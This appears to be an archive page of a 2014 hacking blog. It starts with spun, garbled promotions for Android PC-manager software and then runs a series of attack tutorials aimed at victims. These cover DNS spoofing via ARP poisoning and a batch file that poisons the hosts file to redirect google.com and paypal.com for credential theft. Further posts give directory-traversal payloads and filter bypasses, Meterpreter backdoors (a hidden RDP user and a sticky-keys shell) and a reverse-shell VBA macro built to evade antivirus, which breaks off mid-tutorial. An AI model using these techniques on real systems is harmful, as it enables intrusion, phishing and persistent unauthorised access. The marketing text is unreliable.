June 2014 | 1769

MobileGo Android Manager for PC - Life Saver for Android Freaks

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;">
<div>
Did you ever wish you could carry the data in your PC on your phone? - See more at: <a href="http://anonymous1769.blogspot.in/2014/06/download-all-in-one-android-smartphone.html" target="_blank">http://anonymous1769.blogspot.in/2014/06/download-all-in-one-android-smartphone.html</a></div>
<a href="http://images.wondershare.com/images/mobile/mobilego/mobilego-win-fea01-new.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" target="_blank"><img alt="Transfer File & Media Easily" border="0" src="https://blogger.googleusercontent.com/img/proxy/AVvXsEgH3JlG88Oph-8DE1bCzbCoQVCXHMA-5ZZTPcsF0yrj1Ikq30dwZTj85vB_kJ6I4y_afQ2w3jPuEPksD2Y8BGjC-5cS-OcPcWLxTm6vSkXs4PilcOzct9iyivRJNJGwCv39tU7RhuDxG_dRQdiyQEndJHlusLsUxdIsOY-1ZzH9OlUdHD2wsG0qUlCC7boxDQ=s0-d-e1-ft" /></a> At
 existing, Android OS and Android cellular mobile cell phones are 
especially much typical and convenient to make use of. With numerous 
evolved programs you can do also even more things along with it. You 
could make utilization of your Android os cellular mobile cell phones as
 a storage area device with numerous pictures, tracks, films and 
numerous other individuals. In this situation, there's an obvious chance
 of losing important files inadvertently. But, there's practically 
nothing to be worried. Since there's a system <a href="http://www.wondershare.com/android-manager/" target="_blank">MobileGo</a>,
 is such an android manager by which you can manage your android item 
files from your PC. It's particularly developed and created in order to 
connect with many functions of Android os phone. This android manager 
can recognize even more than 970 android items and support almost all 
brands like HTC, Samsung, ZTE, Sony Ericsson, LG, Acer, Dell and 
numerous other individuals. You can back up and restore your all details
 including SMS, contacts, catalogs, programs with only few of ticks 
making use of this system. You can go SMS, contact record and phone logs
 between different devices without any hassle. Therefore, if you need to
 be fatigued of arbitrarily dropping product from your Android mobile 
phone, after that MobileGo Android administration is there for you 
ALWAYS.

<div>
<h3>
 Transfer File & Media Easily </h3>
Easily manage files in SD card & phone's memory

Wirelessly 
drag-and-drop any files to and from your Android device or simply 
plug-in the USB cable. Managing your SD Card and mobile files can now 
be done with absolute convenience and ease.

Convert video and music to Android-optimized formats Video: From MPEG/MPG/DAT, AVI, MOV, ASF, WMV, MKV, FLV to MP4, MP3.

Audio: From AC3, APE, AIF, AIFF, AMR, AU, FLAC, M3U, MKA, MPA, MP2, WMA, AAC to MP3. Sync between iTunes playlist and Android

Effortlessly import your iTunes music playlist to Android devices and export music to iTunes library. </div>
<div>
<h3>
Transfer & Edit Your Contacts Freely </h3>
<div>
<h3>
 Organize Your Apps </h3>
Download free apps Instantly download apps on your computer.

Install or uninstall apps Install your favorite apps or uninstall useless apps in batches from PC, including those preinstalled on rooted phones.

Back up apps and apps data Back up all or selected apps and apps data from your Android phone without rooting to computer.

Export apps to SD card One click to move apps to SD card to free up the space and speed up your phone.

Speed up your phone Now,
 MobileGo APK file helps you boost your phone, especially when you’re 
playing games, to keep your phone in its best condition all the time. 
 </div>
<div>
<div>
<h3>
 Desktop SMS Assistant </h3>
Group texting to save time No need to text your friends one by one to send the same message. <a href="http://www.wondershare.com/android-manager/" target="_blank">MobileGo for Android </a>lets you text all of them at once from your PC.

Import and export messages Want
 to free your phone’s memory but keep vital messages? Now you can back 
up your important threads as .xlm file or .txt file on the computer. 
Besides, you can import important messages to your Android phone 
freely.

Manage your phone calls on computer MobileGo
 for Android can inform you when you have calls in. No time to answer 
it? Two ways for you to handle it easily. Directly hang it off, or hang
 it off and reply with a message instead on your computer.

<div>
<h3>
 Online Resources in One Place </h3>
Put favorite websites together Collected
 lots of great websites like YouTube, Hulu, Appbrain, etc. in your 
bookmark? You can add them all to MobileGo, and visit them as usual, 
even more conveniently.

1 Click to download apps and videos from Google Play and YouTube Directly click the built-in Google Play, YouTube and Wontube to download apps, videos and songs. </div>
</div>
</div>
</div>
</div>
</div>

MobileGo Android Manager for PC - Life Saver for Android Freaks

Did you ever wish you could carry the data in your PC on your phone? - See more at: http://anonymous1769.blogspot.in/2014/06/download-all-in-one-android-smartphone.html At existing, Android OS a…

29 Jun 2014

Download the All-in-one Android Smartphone PC Manager- Mobogenie

<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
 
 
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxg08PE5qAS6A0QmtpX23utRYfOI7vsdmtln1QhrG2cJQb3hvYCCuxC-0tsPmhT-w7wvd0hAVUa_LSqdql6QQuExLkdmQ0i_e9NO1D36sCTHlJ1b5QPImuBPOt5HQWmOC3gp3QGX7yWK1/s1600/mg-logo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxg08PE5qAS6A0QmtpX23utRYfOI7vsdmtln1QhrG2cJQb3hvYCCuxC-0tsPmhT-w7wvd0hAVUa_LSqdql6QQuExLkdmQ0i_e9NO1D36sCTHlJ1b5QPImuBPOt5HQWmOC3gp3QGX7yWK1/s1600/mg-logo1.jpg" width="400" /></a>Did you ever wish you could carry the data in your PC on your phone? Mobogenie makes it possible! Transfer pictures, videos, music and other data between your PC and phone... all with just one click!</div>
<div>
Mobogenie is a functional and easy to use Android Phone Manager for PC, It can support any Android brand, such as Samsung, Sony, LG, HTC, MOTOROLA or any other brand which you may own, you can use Mobogenie to manage your phone freely and easily. It can help you backup all your files on the phone, so that even if you loose your phone, you don’t loose your contacts. You can restore the files on your PC to your phone with one click.</div>
<div>
<h3 style="text-align: left;">
Key features:</h3>
1. Backup and restore with a single click 
 
2. Manage and edit contacts easily 
 
3. Download the best videos, music and photos on the web 
 
4. Desktop manager for your inbox 
 
5. Apps downloaded like never before 
 
6. 0 Mobile data cost 
<h3 style="text-align: left;">
How to Use after download .apk file :</h3>
Step 1: Run Mobogenie PC software 
Step 2: Click "Install .apk" Icon & Click on "Add file" 
Step 3: Select Mobogenie .Apk file & Click Open 
Step 4: Click on "Confirm" button. This will start the import and install process. Once the install is completed. Import successful message will be show. 
<div>
 </div>
<div>
  <a href="https://shared.com/ei20044hbp?s=l">1.Click here to download this software for your android device</a></div>
<div>
                                                                        or 
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuAMHZwGNs1hWxgiAgybgLIOCfa6XymROoeYZH23b6SQ1mFGKxcMvf_WjjfXnRU1ycWrRTTag54c5Dps04reWL6n5tcF0_8sHHEBlj03EvZZEcE_Dtor9aZc9toQ4nRgOeiRHXXaesef5J/s1600/qrcode.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuAMHZwGNs1hWxgiAgybgLIOCfa6XymROoeYZH23b6SQ1mFGKxcMvf_WjjfXnRU1ycWrRTTag54c5Dps04reWL6n5tcF0_8sHHEBlj03EvZZEcE_Dtor9aZc9toQ4nRgOeiRHXXaesef5J/s1600/qrcode.png" title="Mobogenie PC Manager" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> scan this QR code to download the .apk file directly from your Android device  </td></tr>
</tbody></table>
  <a href="https://shared.com/n9348ae4ou?s=l">2.Click here to download this software for your PC</a></div>
<div>
 </div>
<div>
 </div>
<div>
                                      </div>
</div>
</div>

Download the All-in-one Android Smartphone PC Manager- Mobogenie

Did you ever wish you could carry the data in your PC on your phone? Mobogenie makes it possible! Transfer pictures, videos, music and other data between your PC and phone... all with just one click!…

29 Jun 2014

How to do DNS SPOOF(tutorial)?

<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="LEFT" style="line-height: 0.19in; margin-bottom: 0in; orphans: 2; widows: 2;">
First
What is the DNS ?
(wikipedia.org) 
 The
Domain Name System (DNS) is a hierarchical naming system for
computers, services, or any resource connected to the internet or a
private network. It associates various information with domain names
assigned to each of the participants. For example,
<a href="http://www.example.com/" target="_blank">http://www.example.com</a>
translates
to208.77.188.166. 
 What
does poisoning the DNS allow us to do ? 
 It
allows us to redirect the traffic to another website. First
This is the structure of the network : </div>
<a href="https://www.blogger.com/null" name="more"></a> <div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4044/4337060175_5b99b48ac0.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="200" name="graphics1" src="http://farm5.static.flickr.com/4044/4337060175_5b99b48ac0.jpg" title="DNS-SPOOF-8" width="320" /></a></div>
 1
, 2 and 3 are computers 1
is the computer being the gateway (could be a router)
(172.128.254.1) 2
is the target computer (172.128.254.10) 3
is the attacker using cain Note
:
IPs are just used for this tutorial and chosen randomly. Our
work is on computer number 3 : 1-After
you install cain , open it and go to the sniffer tab 2-Click
on configure and choose your adapter 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4032/4336895163_134d4202fd.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="171" name="graphics2" src="http://farm5.static.flickr.com/4032/4336895163_134d4202fd.jpg" title="DNS-SPOOF-7" width="320" /></a></div>
 
3-Enable
the sniffer (click on the second icon in the toolbar next to the open
icon) 4-Right
click in the empty area and choose scan MAC addresses. We get the
results above. 5-Click
on the APR Tab   
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm3.static.flickr.com/2725/4337645862_9e847b91e4.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="120" name="graphics3" src="http://farm3.static.flickr.com/2725/4337645862_9e847b91e4.jpg" title="DNS-SPOOF-6" width="320" /></a></div>
 
6-Click
on the + sign in the toolbar to add a new ARP poison
routing 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4062/4337656172_57b3d5b3b5.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="190" name="graphics4" src="http://farm5.static.flickr.com/4062/4337656172_57b3d5b3b5.jpg" title="DNS-SPOOF-5" width="320" /></a></div>
 
7-choose
the gateway which is <a href="http://www.hackforums.net/ipcheck.php?action=iplookup&ipaddress=172.128.254.1">172.128.254.1</a>
,
in the next list you’ll get the IP of the computer 2 which is
<a href="http://www.hackforums.net/ipcheck.php?action=iplookup&ipaddress=172.128.254.10">172.128.254.10</a>
and
click ok 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4009/4337049117_87315e8629.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="80" name="graphics5" src="http://farm5.static.flickr.com/4009/4337049117_87315e8629.jpg" title="DNS-SPOOF-4" width="320" /></a></div>
 
8-now
click on the APR-DNS tab 
 
 


 
 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4029/4337796362_14af553609.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="172" name="graphics6" src="http://farm5.static.flickr.com/4029/4337796362_14af553609.jpg" title="DNS-SPOOF-3" width="320" /></a></div>
 
9-click
on the + sign 
 10-enter
the web address that you want to spoof , (in this case when the user
goes to facebook he’ll be redirected to myspace) click on resolve
type the web address that you want to redirect the user to it, and
click ok, and you’ll get the IP of the web address, then click
ok <img align="BOTTOM" alt="DNS-SPOOF" border="0" height="188" name="graphics7" src="http://farm3.static.flickr.com/2731/4337798910_e83774f149.jpg" title="DNS-SPOOF-2" width="500" />  
 
you'll
get something like this: 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://farm5.static.flickr.com/4003/4337057395_171642d13d.jpg" style="margin-left: 1em; margin-right: 1em;"><img align="BOTTOM" alt="DNS-SPOOF" border="0" height="100" name="graphics8" src="http://farm5.static.flickr.com/4003/4337057395_171642d13d.jpg" title="DNS-SPOOF-1" width="320" /></a></div>
 
11-now
to make this work we have to enable APR poisoning , click on the icon
next to the sniffer icon, and everything should work as we
expect. 
 Now
the computer 2 will get the routes poisoned and when the user
requests <a href="http://www.facebook.com/" target="_blank">http://www.facebook.com</a>
he
will be redirected to <a href="http://www.myspace.com/" target="_blank">http://www.myspace.com</a>
. Imagine
what you can do with this technique.</div>

How to do DNS SPOOF(tutorial)?

First What is the DNS ? (wikipedia.org) The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associ…

14 Jun 2014

DNS poisoning using BATCH File

<div dir="ltr" style="text-align: left;" trbidi="on">
Batch file programming is the native programming offered by the 
Microsoft Windows Operating System. Batch file is created using any text
 editors like notepad, WordPad, WinWord or so on, which comprises of a 
sequence of built-in commands used to perform some often done tasks like
 deleting a series of files of same type or of different type, creating 
logs, clearing unwanted craps from your computer and even for creating a
 batch VIRUS. 
<h3>
DNS poisoning:</h3>
 Batch file can has the tendency to modify the transfer zones by 
editing the hosts.txt file that resides inside 
‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to
 some malicious websites instead of landing you to the legitimate 
website. This may also be used for phishing, i.e. redirecting you to a 
bogus website which looks exactly like the legitimate one, and then 
steal credentials. 1. Just open up a notepad, copy and paste the below code @echo off echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt exit 2. Save it as a batch file with the extension .bat 3. Then run it on the Victims computer to infect it. 4.This
 program creates a new entry in the hosts file, so that whenever an user
 attempts to move to www.google.com, he will be re-directed to another 
host that has the IP address of 10.199.64.66, likewise if the user 
attempts to login to the paypal account by typing in www.paypal.com, he 
will be re-directed to another external bogus website that has the IP 
address of 10.199.64.67, where if the user enters the credentials 
unknowingly, they were into the hackers database and he can use it for 
several other purposes. </div>

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which compr…

14 Jun 2014

D.N.S. poisoning using metasploit

D.N.S. poisoning using metasploit

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.(1)Hack remote p.c …

14 Jun 2014

How to exploit Directory traversal vulnerability?

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;">
Backtrack has lots of tools for 
web-application testing. Directory traversal is one of the critical 
vulnerability in web-application. Previously i post about <a href="http://anonymous1769.blogspot.com/2014/06/how-to-bypassing-filter-to-traversal.html" target="_blank">what is directory traversal & how to bypass its filter</a>
 , but that process is manual, it can consume lots of time.But in 
bactrack automatic tools are available for this test which is DOTDOTPWN. If you are on other distro , then you can download it form <a href="http://dotdotpwn.blogspot.com/" target="_blank">here</a>. It's
 a very flexible intelligent fuzzer to discover traversal directory 
vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms
 such as CMSs, ERPs, Blogs, etc. Also, it has a 
protocol-independent module to send the desired payload to the host and 
port specified. On the other hand, it also could be used in a scripting 
way using the STDOUT module. It's written in perl programming 
language and can be run either under *NIX or Windows platforms. It's the
 first Mexican tool included in BackTrack Linux . 
 
 
<h3 style="text-align: left;">
Fuzzing modules supported in this version: </h3>
<div style="text-align: left;">
</div>
 - HTTP - HTTP URL - FTP - TFTP - Payload (Protocol independent) - STDOUT 
<a href="https://www.blogger.com/null" name="more"></a> 
./dotdotpwn.pl -m  http-url -S -u https://localhost/mutillidae/index.php?page=TRAVERSAL -k root -o unix    
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZqgzSSE4UD71QV2iSMUImYPSsaTWEVtPACKGzn4MNzeU5OzkrRTiCkiS_zyMbAREgsNeLyDyyVCeWbss6tAKfK7o5WeQz_r_Eh81VYddFGTHFJYStUZPvUEfZ9mJX0VAQ1eZWXYsnzBx9/s1600/Path-traversal.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="path-traversal" border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZqgzSSE4UD71QV2iSMUImYPSsaTWEVtPACKGzn4MNzeU5OzkrRTiCkiS_zyMbAREgsNeLyDyyVCeWbss6tAKfK7o5WeQz_r_Eh81VYddFGTHFJYStUZPvUEfZ9mJX0VAQ1eZWXYsnzBx9/s320/Path-traversal.PNG" title="path-traversal" width="320" /></a></div>
 
In below figure; you can see vulnerable URL where directory traversal is applicable. 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3J0u4sRjxxRUVpJhBbR0CytcWNv0z6vLPv6Cuk7mMa4dxOEbpUd-2-mOUbN9Y_W_4eOddbIaXxcuk83w5KMioBEmedhSbDIaG6nrsEiknvpenE3HYnnnt36cuy4bWFX1YmTyC0L0HJuQn/s1600/path-traversal-2.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="path-traversal" border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3J0u4sRjxxRUVpJhBbR0CytcWNv0z6vLPv6Cuk7mMa4dxOEbpUd-2-mOUbN9Y_W_4eOddbIaXxcuk83w5KMioBEmedhSbDIaG6nrsEiknvpenE3HYnnnt36cuy4bWFX1YmTyC0L0HJuQn/s320/path-traversal-2.PNG" title="path-traversal" width="320" /></a></div>
</div>
</div>

How to exploit Directory traversal vulnerability?

Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about what is directory traversal & how to by…

14 Jun 2014

How to Bypassing Filter to Traversal Attacks ?

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;">
Bypassing Filter to Traversal Attacks 
 
If your initial attempts to perform a traversal attack, as described 
previously, are unsuccessful, this does not mean that the application is
 not vulnerable. Many application developers are aware of path traversal
 vulnerabilities and implement various kinds of input validation checks 
in an attempt to prevent them. However, those defenses are often flawed 
and can be bypassed by a skilled attacker. 
 
The first type of input filter commonly encountered involves checking 
 
whether the filename parameter contains any path traversal sequences, 
and if so, either rejects the request or attempts to sanitize the input 
to remove the sequences. This type of filter is often vulnerable to 
various attacks that use alternative encodings and other tricks to 
defeat the filter. These attacks all exploit the type of 
canonicalization problems faced by input validation mechanisms 
 
Always try path traversal sequences using both forward slashes and 
 
backslashes. Many input filters check for only one of these, when the file system may support both. 
 
Try simple URL-encoded representations of traversal sequences, using 
 
the following encodings. Be sure to encode every single slash and dot 
 
within your input: 
 
dot                            %2e 
 
forward slash           %2f 
 
backslash                  %5c 
 
<h3>
Try using 16-bit Unicode–encoding:</h3>
 
dot                           %u002e 
 
forward slash          %u2215 
 
backslash                %u2216 
 
<h3>
Try double URL–encoding:</h3>
 
dot                        %252e 
 
forward slash         %252f 
 
backslash                %255c 
 
<h3>
Try overlong UTF-8 Unicode–encoding:</h3>
 
dot                        %c0%2e       %e0%40%ae    %c0ae etc. 
 
forward slash        %c0%af       %e0%80%af      %c0%2f etc. 
 
backslash              %c0%5c       %c0%80%5c      etc. 
 
You can use the illegal Unicode payload type within Burp Intruder to 
generate a huge number of alternate representations of any given 
character, and submit this at the relevant place within your target 
parameter. These are representations that strictly violate the rules for
 Unicode representation but are nevertheless accepted by many 
implementations of Unicode decoders, particularly on the Windows 
platform. 
 
If the application is attempting to sanitize user input by removing 
traversal sequences, and does not apply this filter recursively, then it
 may be possible to bypass the filter by placing one sequence within 
another. For example: 
 
....// 
 
....\/ 
 
..../\ 
 
....\\ 
 
The second type of input filter commonly encountered in defenses against
 path traversal attacks involves verifying whether the user-supplied 
filename contains a suffix (i.e., file type) or prefix (i.e., starting 
directory) that the application is expecting. 
 
Some applications check whether the user-supplied file name ends in a 
 
particular file type or set of file types, and reject attempts to access
 anything else. Sometimes this check can be subverted by placing a URL 
encoded null byte at the end of your requested filename, followed by a 
file type that the application accepts. 
 
<h3 style="text-align: left;">
For example:</h3>
<div style="text-align: left;">
 
../../../../../boot.ini.jpg 
 
The reason this attack sometimes succeeds is that the file type check 
 
is implemented using an API in a managed execution environment 
 
in which strings are permitted to contain null characters (such as 
 
String.endsWith() in Java). However, when the file is actually 
retrieved, the application ultimately uses an API in an unmanaged 
environment in which strings are null-terminated and so your file name 
is effectively truncated to your desired value. 
 
A different attack against file type filtering is to use a URL-encoded 
newline character. Some methods of file retrieval (usually on Unix-based
 platforms) may effectively truncate your file name when a newline is 
encountered: 
 
../../../../../etc/passwd%0a.jpg 
 
Some applications attempt to control the file type being accessed by 
 
appending their own file type suffix to the filename supplied by the 
user. In this situation, either of the preceding exploits may be 
effective, for the same reasons. 
 
Some applications check whether the user-supplied file name starts with a
 particular subdirectory of the start directory, or even a specific file
 name. This check can of course be trivially bypassed as follows: 
 
wahh-app/images/../../../../../../../etc/passwd 
 
If none of the preceding attacks against input filters are successful 
individually, it may be that the application is implementing multiple 
types of filters, and so you need to combine several of these attacks 
simultaneously (both against traversal sequence filters and file type or
 directory filters). If possible, the best approach here is to try to 
break the problem down into separate stages. For example, if the request
 for 
 
diagram1.jpg 
 
is successful, but the request for 
 
foo/../diagram1.jpg 
 
fails, then try all of the possible traversal sequence bypasses until a 
variation on the second request is successful. If these successful 
traversal sequence bypasses don’t enable you to access /etc/passwd, 
probe whether any file type filtering is implemented and can be 
bypassed, by requesting 
 
diagram1.jpg.jpg 
 
Working entirely within the start directory defined by the application, 
try to probe to understand all of the filters being implemented, and see
 whether each can be bypassed individually with the techniques 
described. 
 
Of course, if you have white box access to the application, then your 
task is much easier, because you can systematically work through 
different types of input and verify conclusively what filename (if any) 
is actually reaching the file system. </div>
</div>
<div style="clear: both; padding: 10px; text-align: left;">
</div>
</div>

How to Bypassing Filter to Traversal Attacks ?

Bypassing Filter to Traversal Attacks If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not mean that the application is not vulnerable. M…

14 Jun 2014

Post exploitation & swaparoo backdoor.

<div dir="ltr" style="text-align: left;" trbidi="on">
Today we are going to create valid RDP user in victim pc using two method. 
 
(1)As usual get meterpreter session of victim using metasploit.We need 
system privilege So use getsystem .(getsystem will work in xp. But if 
victim has windows 7 than you have to use bypassuac module;it will work 
if victim has admin provilage.But most of time detecetd by AV. So you 
have to encode it. ) 
 
Now we use meterpreter script which create RDP useraccount for logon. 
run getgui -u username -p password. 
 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Vsv_qVR4LYlXQyN1FOFwEp8MpVK8qks6S1b4kAPPbnHpIoArFFBwyU3NkbKYWQ8c6LffiP6MQRYcTXjRqmDDtQpdH_qviXM1EzdUPVWRvrelmbytOx3-XIAdonPvo5_GePNsVHfUIqZ-/s1600/Screenshot.jpeg" style="margin-left: 1em; margin-right: 1em;"><img alt="msf-post-exploitation" border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-Vsv_qVR4LYlXQyN1FOFwEp8MpVK8qks6S1b4kAPPbnHpIoArFFBwyU3NkbKYWQ8c6LffiP6MQRYcTXjRqmDDtQpdH_qviXM1EzdUPVWRvrelmbytOx3-XIAdonPvo5_GePNsVHfUIqZ-/s320/Screenshot.jpeg" title="msf-post-exploitation" width="320" /></a></div>
 
Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials. 
 
<div style="text-align: left;">
rdesktop victim i.p. </div>
 
<a href="https://www.blogger.com/null" name="more"></a><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9irQ0rrVvaZLBI3ZExabXm8fRfKk8EfwIzA8IYCzuO-rJ0Q-iw7a9Zh4T-7I30LPpKnXdoFtl6Nbk0bJ5zmny77m_lk0lbUW593V4HVObqlW54QRl_52eTFVovp_ytPs6i4HdSBvZ3JOe/s1600/Screenshot-1.jpeg" style="margin-left: 1em; margin-right: 1em;"><img alt="msf-post-exploitation-2" border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9irQ0rrVvaZLBI3ZExabXm8fRfKk8EfwIzA8IYCzuO-rJ0Q-iw7a9Zh4T-7I30LPpKnXdoFtl6Nbk0bJ5zmny77m_lk0lbUW593V4HVObqlW54QRl_52eTFVovp_ytPs6i4HdSBvZ3JOe/s320/Screenshot-1.jpeg" title="msf-post-exploitation-2" width="320" /></a></div>
 
When you complete your session type following command for cleanup 
process; so after you logoff created useraccount will be deleted. 
 
run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc 
 
<div style="text-align: left;">
(2)Now we use another method; it`s backdoor.But it`s physical backdoor; 
so you have to present at victim pc to get access.But backdoor is 
created remotely.</div>
<div style="text-align: left;">
 
Download swaparoo script from <a href="https://github.com/Un0wnX/swaparoo/blob/master/swaparoo.rb" target="_blank">here</a> . 
 
Put it into the /opt/msf/scripts/meterpreter folder 
 
After that get meterpreter shell using any method. 
 
Now type run swaparoo -h</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiPjJ-mLSeK2LoW-CpW6LLQkINYXTfrD-YO_ec4B-OWS8WFGAYfhtVuLeKZh_nxLbtwQ1qcSJsaqfIcyS__fU6IShPTclXdeHxJ5_wY9MZoZRI65gHfCJFS4Te_TaMMn5MkU0XZh0g2R3D/s1600/reenshot.jpeg" style="margin-left: 1em; margin-right: 1em;"><img alt="swaparoo-backdoor" border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiPjJ-mLSeK2LoW-CpW6LLQkINYXTfrD-YO_ec4B-OWS8WFGAYfhtVuLeKZh_nxLbtwQ1qcSJsaqfIcyS__fU6IShPTclXdeHxJ5_wY9MZoZRI65gHfCJFS4Te_TaMMn5MkU0XZh0g2R3D/s320/reenshot.jpeg" title="swaparoo-backdoor-1" width="320" /></a></div>
 
Now type  run swaparoo 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPEvH2GQw2gHxOVn8eC2Nc6BmYPfhAruG_pgedDgMOWRyxzXftCu3TTjbc3CQMmCEXk-eK0JYvPqpdfHFdWYWts5CfjgzifuXgLBuGpair3Gv28rcmvFaEOJKFa01kucn4LRb_wQifNaue/s1600/Sot.jpeg" style="margin-left: 1em; margin-right: 1em;"><img alt="swaparoo-backdoor" border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPEvH2GQw2gHxOVn8eC2Nc6BmYPfhAruG_pgedDgMOWRyxzXftCu3TTjbc3CQMmCEXk-eK0JYvPqpdfHFdWYWts5CfjgzifuXgLBuGpair3Gv28rcmvFaEOJKFa01kucn4LRb_wQifNaue/s320/Sot.jpeg" title="swaparoo-backdoor-2" width="320" /></a></div>
 
As you can see in image last line is  "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!" 
 
So when you restart victim pc & login screen appear ; just press 
shift key 5 times (From victim `s keyboard)you get cmd with system 
privilege.Now from cmd you can do anything like remove user,add user, 
change password. 
 
If you want to remove this backdoor then type following command 
 
run swaparoo -r  
 
What`s limitation? 
 
Anyone who is physically  present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.</div>

Post exploitation & swaparoo backdoor.

Today we are going to create valid RDP user in victim pc using two method. (1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will w…

14 Jun 2014

Get shell Using Shellcode in Macro.

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;">
We can execute shellcode directly in macro. It`s very old method, but 
still it`s useful ; because AV don`t trigger it.First we will generate 
VB code of our payload. 
 
msfconsole 
use payload/windows/meterpreter/reverse_tcp 
set LHOST 192.168.56.102 
set LPORT 443 
generate -t vba 
exploit 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShPMPwl968DKCYDyBHIJ6x7AP7C7VQd-E1hwdR_3Jabh6GRBQkZP8s35nZZGqQ_YY4S0ZUOGTZqxI7DLiKHQdbIQ-CX5fMpWSMVDwN8UvfzTh8PpsrZq9Il8cb1qnI7BGLveBf5xG_Jbd/s1600/Screenshot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShPMPwl968DKCYDyBHIJ6x7AP7C7VQd-E1hwdR_3Jabh6GRBQkZP8s35nZZGqQ_YY4S0ZUOGTZqxI7DLiKHQdbIQ-CX5fMpWSMVDwN8UvfzTh8PpsrZq9Il8cb1qnI7BGLveBf5xG_Jbd/s1600/Screenshot.png" /></a></div>
<a href="https://www.blogger.com/null" name="more"></a> 
Now we have generated our shellcode. Now we will create macro. 
 
(1)Open any word or Excell document 
 
(2)Click on view & then click on Macros. 
 
(3)Give name to macro & create macro. 
 
<div class="separator" style="clear: both; text-align: center;">
